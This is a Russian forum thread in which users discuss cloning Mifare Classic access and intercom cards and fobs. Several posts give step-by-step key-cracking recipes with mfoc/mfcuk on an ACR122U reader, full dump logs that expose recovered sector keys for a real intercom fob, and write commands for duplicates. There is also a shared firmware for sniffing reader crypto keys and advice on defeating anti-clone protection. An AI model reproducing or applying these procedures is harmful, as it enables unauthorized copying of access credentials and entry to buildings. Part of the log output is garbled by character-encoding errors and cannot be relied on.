максим асбк 0 Жалоба Опубликовано 29 мая, 2019 А какой смысл, сделать копию это не помешает, CP-Z2 MF только читает данные, зачем ставить ключ на запись другой? Сделать можно на любом оборудовании для работы с Mifare, просто записав требуемые ключи и условия доступа в карту.Для записи уже есть Z-2 USB MF , а как через него записать информацию нет понимания. Это пожелание заказчика и спорить и что либо доказывать в нашем варианте нет смысла. Так же у него есть принтер со встроенным кодером (Enduro3E Duo артикул 3633-3025) и хочет чтобы карты при печати автоматически записывались с новым UID и паролем. Нам нужно создать карту для программирования считывателей и такую же инфу писать в карты. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pavel 578 Жалоба Опубликовано 29 мая, 2019 UID в картах не перезаписывается. Программируются новые карты и считыватель через Z-2 USB MF с помощью карт объекта, инструкции есть на сайте Айронлоджика. Но никаких ключ для записи/ключ для чтения не будет. При печати автоматически тоже ничего делаться не будет. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
максим асбк 0 Жалоба Опубликовано 29 мая, 2019 UID в картах не перезаписывается. Программируются новые карты и считыватель через Z-2 USB MF с помощью карт объекта, инструкции есть на сайте Айронлоджика. Но никаких ключ для записи/ключ для чтения не будет. При печати автоматически тоже ничего делаться не будет.Так а разве я сам не могу сгенирировать карту объекта? записав в нее нужную мне информацию и закрыв ее своим ключем. У Айронлоджик сделав карту объекта я не имею возможности посмотреть ни ключи которыми она зашифрована ни инфотмацию в секторах Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
максим асбк 0 Жалоба Опубликовано 29 мая, 2019 UID в картах не перезаписывается. Программируются новые карты и считыватель через Z-2 USB MF с помощью карт объекта, инструкции есть на сайте Айронлоджика. Но никаких ключ для записи/ключ для чтения не будет. При печати автоматически тоже ничего делаться не будет.Так а разве я сам не могу сгенирировать карту объекта? записав в нее нужную мне информацию и закрыв ее своим ключем. У Айронлоджик сделав карту объекта я не имею возможности посмотреть ни ключи которыми она зашифрована ни инфотмацию в секторахИ я не хочу перезаписывать UID а написать свой и обучить считыватель читать его не из 0 сектора, а из того что я задам Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pavel 578 Жалоба Опубликовано 29 мая, 2019 Сами карту объекта сделать Вы не можете. А читать данные из любого сектора можно научить считыватель, однако это все делается уже не через карту объекта, читайте мануалы у айронлоджика. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
максим асбк 0 Жалоба Опубликовано 29 мая, 2019 Сами карту объекта сделать Вы не можете. А читать данные из любого сектора можно научить считыватель, однако это все делается уже не через карту объекта, читайте мануалы у айронлоджика.А как же тогда делается защита у всех остальных ( помимо айронлоджик) , ведь они так же паролят сектора и обучают считки? Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Pavel 578 Жалоба Опубликовано 29 мая, 2019 А нам то откуда знать, каждый делает он хочет.Например, заходится в меню и устанавливается криптоключ вручную, так сделано в какой-то модели цифрал. Этот же считыватель и пишет этот криптоключ на метки. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tolyator 0 Жалоба Опубликовано 31 мая, 2019 По просьбам трудящихся версия с возможностью сохранения/загрузки содержимого меток Здравствуйте, уважаемый. Я здесь недавно. подскажите: где можно увидеть то, о чём вы пишите в этом сообщении? У меня что то ничего не отображается кроме текста в этом сообщении...Ну, или где можно скачать Вашу программу последней версии? Нашёл только 1.3Ну, или кто может подскажет: где скачать Зорговскую программу???Или может кто-нибудь добрый на почту tolyator@bk.ru скинет? Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
voron 1 Жалоба Опубликовано 1 июня, 2019 tolyator Скинул. 1 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tolyator 0 Жалоба Опубликовано 3 июня, 2019 tolyator Скинул.Здравствуйте. А куда скинули? В ящике нет ничего... Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
tolyator 0 Жалоба Опубликовано 3 июня, 2019 voron (01 Июнь 2019 - 13:42) писал: tolyator Скинул.Здравствуйте. А куда скинули? В ящике нет ничего... Всё, спасибо, получил. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Heupoxupypr 0 Жалоба Опубликовано 3 июня, 2019 Добрый день! Являюсь новичком на данном форуме. 2 дня изучал данную тему и вот к чему пришел.На работе возникла потребность создать копии карточек доступа в помещения, так как увеличилось количество сотрудников у которых плохо снимаются отпечатки пальцев. Имеется девайс ACR122U-a9. Установлен оригинальны пакет SDK (ломаный). Также есть исходная карта. Первая проблема в том, что выполняя действия по алгоритму поста #27 Ингредиенты:1 ACR122U-A9, 1 компьютер с ОС Windows, 1 клонируемая карта (точнее, карта с которой нужно узнать "KEY A" для нулевого сектора) 1 карта клон (например из комплекта с ридером)Подготовка:С комплектного диска устанавливаем драйвер для ридера и комплект SDK. Скачиваем и распаковываем MFCUK_D от dark simpsonРецепт:Подключаем ридер, кладём на него клонируемую карту. Ридер оповещает нас радостным писком и зелёным индикатором.Через Total Commander заходим в папку, где распакован MFCUK_D и в командной строке вводим "cmd". В открывшейся консоли вводим "mfoc_d.exe -O dump". В итоге получаем что-то вроде этогоОтвалившуюся карту (красный индикатор на ридере) и остановившийся процесс подбора. Не беда! Повторно вводим "mfoc_d.exe -O dump" (можно нажать клавишу "стрелка вверх" для быстрого вызова предыдущей команды) и ждём. Время подбора не сильно зависит от процессора и колеблется в пределах 4 - 20 минут. По окончанию процесса ридер снова сигнализирует о присутствии карты. А в консоли мы видим результат подбораВ данном случае KEY A для нулевого сектора -- 112233000000Меняем карту на ридере на "чистую" и запускаем утилитку EasyKey из пакета SDK. В блоке "Reader Connection" выбираем "PC/SC". В блоке "New Key A" вместо эфочек вводим ключ 11 22 33 00 00 00. Если карта программировалась ранее и текущий "KEY A" для нулевого сектора не является транспортным ключом "FF FF FF FF FF FF", то в блоке "Current Login Parameters" вводим соответствующий ключик. Жмём "Format Sector 0". Секунда. Готово! И ещё. В папке, из которой запускался "mfoc_d" останется файлик "dump" который является полным дампом клонируемой карты. не распознается ридер при выполнении команды mfoc64.exe -O dump и выдается сообщение Can't find reader or hardware errror! Второй момент. Изначально на карточках были написаны номера. Подозреваю что они уже были занесены в терминалы доступа для отслеживания времени входа и выхода. Изменение номера не нужно, нужна просто копия имеющейся карты. Какие будут рекомендации? Mifare decryption тоже не может прочитать KEY A Заранее спасибо. Если где написал глупость, прошу прощения, так как только постигаю эту тему. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
yuvelir 1 Жалоба Опубликовано 6 июня, 2019 Ребята,помогите,на ноутбуке стоит программа версии 1.3.1 есть более новая слышал скиньте пжлст на почту yuvelir1@gmail.com ,я новичёк))спсб заранее Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
ILogic 4 Жалоба Опубликовано 19 июня, 2019 UID в картах не перезаписывается. Программируются новые карты и считыватель через Z-2 USB MF с помощью карт объекта, инструкции есть на сайте Айронлоджика. Но никаких ключ для записи/ключ для чтения не будет. При печати автоматически тоже ничего делаться не будет.Так а разве я сам не могу сгенирировать карту объекта? записав в нее нужную мне информацию и закрыв ее своим ключем. У Айронлоджик сделав карту объекта я не имею возможности посмотреть ни ключи которыми она зашифрована ни инфотмацию в секторахИ я не хочу перезаписывать UID а написать свой и обучить считыватель читать его не из 0 сектора, а из того что я задам Можно и Карту объекта и ключ с произвольным номером сделать через сайт https://smartkey.one/ Но зачем это делать в вашем случае я не понимаю... желание заказчика явно ведёт к ухудшению защиты. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
svk4286 2 Жалоба Опубликовано 24 июня, 2019 (изменено) Всем привет! Хочу предложить вам в помощь устройство,позволяющее так же,как SMKey,Proxmark или Chameleon захватывать криптоключи от считывателя домофона.Состоит оно из "малого джентельменского набора" - модуля PN532 и USB-UART преобразователя,которые уже наверняка у некоторых имеются.Докупить придется только отладочную плату STM32F103C8T6( так называемую BluePill ),прошить её предлагаемой прошивкой и собрать всё перемычками воедино.Я специально хотел соорудить максимально устройство,не требующее пайки, и возможно это удалось.Работать можно с любой терминальной программой на компьютере или смартфоне.Фото получившейся "хрени" воткнул в архив. UPD 2: Сегодня провел вторые натурные испытания с новой прошивкой и другим модулем PN532(прежний оказался с браком) - результат прекрасный,на этот раз считывает без проблем.Перехватил криптоключ,снял дамп и реально удалось сделать копию на обычный Classic! Интересно,зачем IronLogic сделал такую дырку и когда собирается её прикрыть?KeyGrab_1.1.rar Изменено 28 июня, 2019 пользователем svk4286 Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
apple 6 Жалоба Опубликовано 27 июня, 2019 хотелось бы видеть подобное на платформе уже с usb и портами терминала на борту . выбор STM32F103C8T6 более чем странный . не работает оно не из за антенны , а из за режимов антиклон .которые есть в любой панели сейчас . мы обходим антиклон snoop - записью обмена с оригинальными метками на proxmark . именно поэтому вынимание ключей из каждой панели разное так как фильтр антиклон всегда разный . те кто клепает tmd 5s и smkey просто раздобыли все панели с последними обновлениями посмотрели как там работает фильтр антиклон и сделали обманку . Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Бородатый 0 Жалоба Опубликовано 27 июня, 2019 (изменено) Граждане, здравствуйте!Тоже новичок, но почитывая мануалы и форумы я сумел-таки создать дубликат шифрованного брелка от домофона (Метаком, Mifare)Сначала пытался на связке pn532 (от Elechouse) + FT232RL. Дамп снял, но вот записать не получилось. Сначала не получилось на mifare zero, потом не получилось на китайских брелках.Пришлось заказать ACR122U-A9 (куда деваться, жажда эксперимента!) С его помощью я записал полный дамп на несколько брелков, но вот беда: Ни один из клонов не открывает домофон. Снимаю mfoc-ом дампы с оригинала и копии, сравниваю дампы - точная копия. Все символы 1 в 1 (пользовался ПО Araxis Merge). Записывал 2-мя вариантами:1. ПО от китайцев: Mifate Calssic Casrd Recovery Beta V0.12. windows-версия nfc-mfclassic (mfoc тоже виндовый)>nfc-mfclassic.exe W a ./dump_duplicate.dump ./dump.dump Я теперь просто даже не понимаю что мне читатьКто подскажет в чем дело? Хочется завершить начатое. кстати, при чтении блока 0 в Mifate Calssic Casrd Recovery Beta V0.1 оригинал и клон выдают разные результатыОригинал: CARD UID:9C26C076 Successful connection to ACS ACR122 0 << FF CA 00 00 00 >> 9C 26 C0 76 90 00 CARD UID:9C26C076 << FF 00 00 00 08 D4 08 63 02 00 63 03 00 >> D5 09 90 00 << FF 00 00 00 06 D4 42 50 00 57 CD >> D5 43 01 90 00 << FF 00 00 00 05 D4 08 63 3D 07 >> D5 09 90 00 << FF 00 00 00 03 D4 42 40 >> D5 43 01 90 00 Select Card Failed. Клон Successful connection to ACS ACR122 0 << FF CA 00 00 00 >> 9C 26 C0 76 90 00 CARD UID:9C26C076 << FF 00 00 00 08 D4 08 63 02 00 63 03 00 >> D5 09 90 00 << FF 00 00 00 06 D4 42 50 00 57 CD >> D5 43 01 90 00 << FF 00 00 00 05 D4 08 63 3D 07 >> D5 09 90 00 << FF 00 00 00 03 D4 42 40 >> D5 43 00 0A 90 00 << FF 00 00 00 05 D4 08 63 3D 00 >> D5 09 90 00 << FF 00 00 00 03 D4 42 43 >> D5 43 00 0A 90 00 << FF 00 00 00 08 D4 08 63 02 80 63 03 80 >> D5 09 90 00 << FF 00 00 00 05 D4 40 01 30 00 >> D5 41 00 9C 26 C0 76 0C 08 04 00 02 A7 DE 89 69 CE 0D 1D 90 00 Read 0 Block Success. Если что не так, извиняйте... Сразу не закидывайте помидорами: подскажите, я исправлюсь --- Добавлено 10.07.2019, спасибо apple!В домофоне стоит защита от копирования. Китайские ключи и Mifare Zero не подходят.Заказал тут OTP2 и о чудо, работает!Еще раз спасибо, apple! Изменено 10 июля, 2019 пользователем Бородатый Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
apple 6 Жалоба Опубликовано 27 июня, 2019 там блоки закрыты . где команды получения ключей ? снимаешь дамп - получаешь ключи либо атакой если метка ломается либо через snoop proxmark (скорее всего не ломается) .не надо было 122 брать надо было proxmark mini брать .неправильно ты делаешь копии и оборудования для правильно у тебя нет . по mfoc - O там все сектора он получает ? если все ну так пиши не на зеро а на ОТP 2 заготовку - потому как OTP 1 ты только проксмарком посекторно запишешь . а трейлером пишется OTP 2 через PN532 и libnfc тут не те логи указаны - обмен вообще неинтересен . надо лог получения дампа и лог записи дампа и всене понятно что читать - может почитать эту ветку целиком ... для начала Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Бородатый 0 Жалоба Опубликовано 27 июня, 2019 Спасибо за быстрый ответ, добрый человек! Ключ подобран командой mfcuk.exe -C -R 0:A -s 250 -S 250 Он выдал мне 1 ключ A. Далее я остановил подборДалее, начал делать дамп, остальные ключи подбираются в процессе дампа mfoc.exe -O key.dump -k a0db945e24c3 Сейчас я знаю все 16 ключей А и могу вводить команду mfoc.exe -O key.dump -k a0db945e24c3 -k 793d96582aba -k 2b0036e0e0d3 -k 29fd2ff82411 -k 0f3de918b7fa -k 13bc3eed3aac -k 795c0468e14f -k 13dca8bfb1eb -k 1d994021bb21 -k c89a583e0d04 -k bc98420bd69e -k 852b5361dcd2 -k 959430931573 -k b6348eca8961 -k 9b5b26ac711a -k 1bb582ef26fe Лог дампа (пардон, у проги есть проблема с кодировкой, но и так более-менее понятно что происходит) >mfoc.exe -O key.dump -k a0db945e24c3 -k 793d96582aba -k 2b0036e0e0d3 -k 29fd2ff82411 -k 0f3de918b7fa -k 13bc3eed3aac -k 795c0468e14f -k 13dca8bfb1eb -k 1d994021bb21 -k c89a583e0d04 -k bc98420bd69e -k 852b5361dcd2 -k 959430931573 -k b6348eca8961 -k 9b5b26ac711a -k 1bb582ef26fe *************************** ▒╛│╠╨Є╙╔┴╓▒р╥ыгм└·╩▒╥╗╨╟╞┌. ╘┤┤·┬ы└┤╫╘╙┌NFC╡─GIT┐к╘┤┐т. гб▒╛│╠╨Є╜√╓╣╙├╙┌╖╟╖и╙├═╛гб. ╖ё╘Є║є╣√╫╘╕║ . ╕╜▒╛╚╦╙╩╧фг║64101226@qq.com *************************** ╬╥▓╗╗с╜л┤╦╚э╝■╙├└┤╬е╖и╖╕╫я! 1.╩╟ 2.▓╗╩╟ ╟ы╩ф╚ы─у╡─╤б╘ё: 1 ╗Є╒▀ 2 1 ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы a0db945e24c3 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 793d96582aba ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 2b0036e0e0d3 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 29fd2ff82411 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 0f3de918b7fa ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 13bc3eed3aac ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 795c0468e14f ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 13dca8bfb1eb ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 1d994021bb21 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы c89a583e0d04 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы bc98420bd69e ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 852b5361dcd2 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 959430931573 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы b6348eca8961 ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 9b5b26ac711a ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╠э╝╙╥╗╕Ў╥╤╓к├▄┬ы 1bb582ef26fe ╡╜├▄┬ы┴╨▒э╓╨│╔╣ж ╒╥╡╜Mifare Classic 1k ┐и ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 * UID size: single * bit frame anticollision supported UID (NFCID1): 9c 26 c0 76 SAK (SEL_RES): 08 * Not compliant with ISO/IEC 14443-4 * Not compliant with ISO/IEC 18092 Fingerprinting based on MIFARE type Identification Procedure: * MIFARE Classic 1K * MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1 * SmartMX with MIFARE 1K emulation Other possible matches based on ATQA & SAK values: ╒¤╘┌│в╩╘┤╙╫╘┤°╡──м╚╧├╪╘┐╓╨╗╓╕┤│Ў╦∙╙╨╡─├▄┬ыг╗ ╖√║┼╧є╒ў╡─╥т╥х: '.' ├╗╙╨╖в╧╓├╪╘┐, '/' ╖в╧╓├╪╘┐ A, '\' ╖в╧╓├╪╘┐B, 'x' ┴╜╕Ў├╪╘┐╢╝├╗╙╨╖в╧╓ [├╪╘┐: a0db945e24c3] -> [x...............] [├╪╘┐: 793d96582aba] -> [xx..............] [├╪╘┐: 2b0036e0e0d3] -> [xxx.............] [├╪╘┐: 29fd2ff82411] -> [xxxx............] [├╪╘┐: 0f3de918b7fa] -> [xxxxx...........] [├╪╘┐: 13bc3eed3aac] -> [xxxxxx..........] [├╪╘┐: 795c0468e14f] -> [xxxxxxx.........] [├╪╘┐: 13dca8bfb1eb] -> [xxxxxxxx........] [├╪╘┐: 1d994021bb21] -> [xxxxxxxxx.......] [├╪╘┐: c89a583e0d04] -> [xxxxxxxxxx......] [├╪╘┐: bc98420bd69e] -> [xxxxxxxxxxx.....] [├╪╘┐: 852b5361dcd2] -> [xxxxxxxxxxxx....] [├╪╘┐: 959430931573] -> [xxxxxxxxxxxxx...] [├╪╘┐: b6348eca8961] -> [xxxxxxxxxxxxxx..] [├╪╘┐: 9b5b26ac711a] -> [xxxxxxxxxxxxxxx.] [├╪╘┐: 1bb582ef26fe] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: ffffffffffff] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 000000000000] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: aabbccddeeff] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 714c5c886e97] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: a0478cc39091] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx] [├╪╘┐: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx] ╔╚╟° 00 - ╖в╧╓ ├╪╘┐ A: a0db945e24c3 ╖в╧╓ ├╪╘┐ B: 251870d37d4f ╔╚╟° 01 - ╖в╧╓ ├╪╘┐ A: 793d96582aba ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 02 - ╖в╧╓ ├╪╘┐ A: 2b0036e0e0d3 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 03 - ╖в╧╓ ├╪╘┐ A: 29fd2ff82411 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 04 - ╖в╧╓ ├╪╘┐ A: 0f3de918b7fa ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 05 - ╖в╧╓ ├╪╘┐ A: 13bc3eed3aac ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 06 - ╖в╧╓ ├╪╘┐ A: 795c0468e14f ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 07 - ╖в╧╓ ├╪╘┐ A: 13dca8bfb1eb ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 08 - ╖в╧╓ ├╪╘┐ A: 1d994021bb21 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 09 - ╖в╧╓ ├╪╘┐ A: c89a583e0d04 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 10 - ╖в╧╓ ├╪╘┐ A: bc98420bd69e ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 11 - ╖в╧╓ ├╪╘┐ A: 852b5361dcd2 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 12 - ╖в╧╓ ├╪╘┐ A: 959430931573 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 13 - ╖в╧╓ ├╪╘┐ A: b6348eca8961 ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 14 - ╖в╧╓ ├╪╘┐ A: 9b5b26ac711a ╖в╧╓ ├╪╘┐ B: cb9057683001 ╔╚╟° 15 - ╖в╧╓ ├╪╘┐ A: 1bb582ef26fe ╖в╧╓ ├╪╘┐ B: cb9057683001 ╦∙╙╨╡─╔╚╟°╢╝╩╟╩╣╙├╡──м╚╧├╪╘┐бг Auth with all sectors succeeded, dumping keys to a file! Block 63, type A, key 1bb582ef26fe :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 62, type A, key 1bb582ef26fe :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 61, type A, key 1bb582ef26fe :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 60, type A, key 1bb582ef26fe :00 00 00 00 00 00 00 00 01 00 58 00 5b c3 00 00 Block 59, type A, key 9b5b26ac711a :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 58, type A, key 9b5b26ac711a :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 57, type A, key 9b5b26ac711a :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 56, type A, key 9b5b26ac711a :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 55, type A, key b6348eca8961 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 54, type A, key b6348eca8961 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 53, type A, key b6348eca8961 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 52, type A, key b6348eca8961 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 51, type A, key 959430931573 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 50, type A, key 959430931573 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 49, type A, key 959430931573 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 48, type A, key 959430931573 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 47, type A, key 852b5361dcd2 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 46, type A, key 852b5361dcd2 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 45, type A, key 852b5361dcd2 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 44, type A, key 852b5361dcd2 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 43, type A, key bc98420bd69e :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 42, type A, key bc98420bd69e :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 41, type A, key bc98420bd69e :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 40, type A, key bc98420bd69e :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 39, type A, key c89a583e0d04 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 38, type A, key c89a583e0d04 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 37, type A, key c89a583e0d04 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 36, type A, key c89a583e0d04 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 35, type A, key 1d994021bb21 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 34, type A, key 1d994021bb21 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 33, type A, key 1d994021bb21 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 32, type A, key 1d994021bb21 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 31, type A, key 13dca8bfb1eb :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 30, type A, key 13dca8bfb1eb :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 29, type A, key 13dca8bfb1eb :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 28, type A, key 13dca8bfb1eb :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 27, type A, key 795c0468e14f :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 26, type A, key 795c0468e14f :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 25, type A, key 795c0468e14f :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 24, type A, key 795c0468e14f :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 23, type A, key 13bc3eed3aac :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 22, type A, key 13bc3eed3aac :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 21, type A, key 13bc3eed3aac :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 20, type A, key 13bc3eed3aac :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 19, type A, key 0f3de918b7fa :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 18, type A, key 0f3de918b7fa :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 17, type A, key 0f3de918b7fa :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 16, type A, key 0f3de918b7fa :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 15, type A, key 29fd2ff82411 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 14, type A, key 29fd2ff82411 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 13, type A, key 29fd2ff82411 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 12, type A, key 29fd2ff82411 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 11, type A, key 2b0036e0e0d3 :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 10, type A, key 2b0036e0e0d3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 09, type A, key 2b0036e0e0d3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 08, type A, key 2b0036e0e0d3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 07, type A, key 793d96582aba :00 00 00 00 00 00 ff 07 80 69 cb 90 57 68 30 01 Block 06, type A, key 793d96582aba :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 05, type A, key 793d96582aba :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 04, type A, key 793d96582aba :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Block 03, type A, key a0db945e24c3 :00 00 00 00 00 00 ff 07 80 69 25 18 70 d3 7d 4f Block 02, type A, key a0db945e24c3 :81 b9 22 ed 52 a0 25 45 1c d0 14 c5 84 92 85 df Block 01, type A, key a0db945e24c3 :9c 26 c0 76 00 00 00 00 23 80 00 e8 cc 63 6d 2e Block 00, type A, key a0db945e24c3 :9c 26 c0 76 0c 08 04 00 02 a7 de 89 69 ce 0d 1d Лог записи >nfc-mfclassic.exe W a ./dump_duplicate.dump ./dump.dump NFC reader: ACS ACR122 0 / ACR122U214 opened Found MIFARE Classic card: ISO/IEC 14443A (106 kbps) target: ATQA (SENS_RES): 00 04 UID (NFCID1): 9c 26 c0 76 SAK (SEL_RES): 08 Guessing size: seems to be a 1024-byte card Sent bits: 50 00 57 cd Sent bits: 40 (7 bits) Received bits: a (4 bits) Sent bits: 43 Received bits: 0a Writing 64 blocks |................................................................| Done, 64 of 64 blocks written. Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
apple 6 Жалоба Опубликовано 27 июня, 2019 неправильная там команда mfoc это атака на сектора через 1 ключ . не надо там ничего больше указывать . ну и чего далее ? все тут нормально карта старая и ее ломанули . пиши на OTP 2 метки из магазина Павла . тут продаются . там антиклон в домофоне и зеро болванки там не канают . будет работать . по другому никак . как уже написали libnfc посекторно писать не умеет и otp1 ты ничем кроме проксмарка и этих писалок tmd не запишешь https://ikey.ru/28538-mifareotp/ Цитата Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
